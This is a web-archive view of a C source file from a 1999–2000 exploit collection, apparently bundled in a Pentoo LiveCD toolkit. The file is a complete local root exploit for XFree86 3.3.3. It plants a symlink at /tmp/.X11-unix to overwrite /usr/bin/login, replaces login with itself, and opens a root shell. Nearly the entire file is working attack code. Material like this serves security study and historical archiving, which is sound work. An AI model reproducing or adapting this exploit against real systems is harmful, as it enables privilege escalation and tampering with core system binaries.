home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / xwin / xxploit.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  2KB  |  106 lines

---

1. /*** local XFree 3.3.3-symlink  root-compromise.
2.  *** Tested under FreeBSD 3.1 (but should work on others 2)
3.  *** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G. 
4.  *** (check out http://www.kalug.lug.net/stealth or /coding for
5.  ***  other kewl stuff!)
6.  ***
7.  *** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.
8.  *** Even if this program restores all, you should backup your
9.  *** login before running this.
10.  ***/
11.  
12. #include <stdio.h>
13. #include <unistd.h>
14. #include <errno.h>
15. #include <fcntl.h>
16.  
17. #define LOGIN "/usr/bin/login"
18. #define TELNET "/usr/bin/telnet"
19.  
20. int cp(const char*, const char*, int);
21.  
22. int main(int argc, char **argv)
23. {
24.  
25.   char *telnet[] = {TELNET, "localhost", NULL};
26.   char *shell[] = {"/bin/sh", NULL};
27.   char *X[] = {"/usr/X11R6/bin/xinit", NULL};
28.   FILE *f = NULL;
29.   int p = 0;
30.   char buf[1000] = {0};
31.  
32.   /* the rootshell */
33.   if (!geteuid() || !getuid())
34.     {
35.       unlink(LOGIN);
36.       cp("/tmp/L", LOGIN, 1);
37.       chmod(LOGIN, 04555);
38.       printf("Welcome!\n");
39.       unlink("/tmp/.X11-unix");
40.       unlink("/tmp/L");
41.       execve(*shell, shell, NULL);
42.     }
43.  
44.   /* back up */
45.   cp(LOGIN, "/tmp/L", 1);
46.   if (symlink(LOGIN, "/tmp/.X11-unix") < 0)
47.     {
48.       perror("symlink (/tmp/.X11-unix)");
49.       exit(errno);
50.     }
51.   if ((p = fork()) < 0)
52.     {
53.       perror("fork");
54.       exit(errno);
55.     }
56.   else if (p > 0)
57.     {
58.       sleep(7);
59.       kill(p, 9);
60.       cp(argv[0], LOGIN, 1);
61.       execve(telnet[0], telnet, NULL);
62.       perror("fatal:");
63.     }
64.   else
65.     {
66.       printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n");
67.       printf("\n-> Please give me some seconds... <-\n\n");
68.       execve(X[0], X, NULL);
69.     }
70.   return 0;
71. }
72.  
73.  
74. int cp(const char *from, const char *to, int how)
75. {
76.   int in = 0, out = 0, r = 0;
77.   char buf[1000] = {0};
78.  
79.  
80.   printf("cp %s %s\n", from, to);
81.   /* overwrite ? */
82.   if (how == 1)
83.     how = O_RDWR|O_TRUNC|O_CREAT;
84.   else
85.     how = O_RDWR|O_CREAT;
86.  
87.   if ((out = open(to, how)) < 0)
88.     {
89.       perror("open 1");
90.       exit(errno);
91.     }
92.   if ((in = open(from, O_RDONLY)) < 0)
93.     {
94.       perror("open 2");
95.       exit(errno);
96.     }
97.   while ((r = read(in, buf, 1000-1)) > 0)
98.     {
99.       write(out,buf,r);
100.       memset(buf,0,1000);
101.     }
102.   close(in);
103.   close(out);
104.   return 0;
105. }
106. /*                    www.hack.co.za              [2000]*/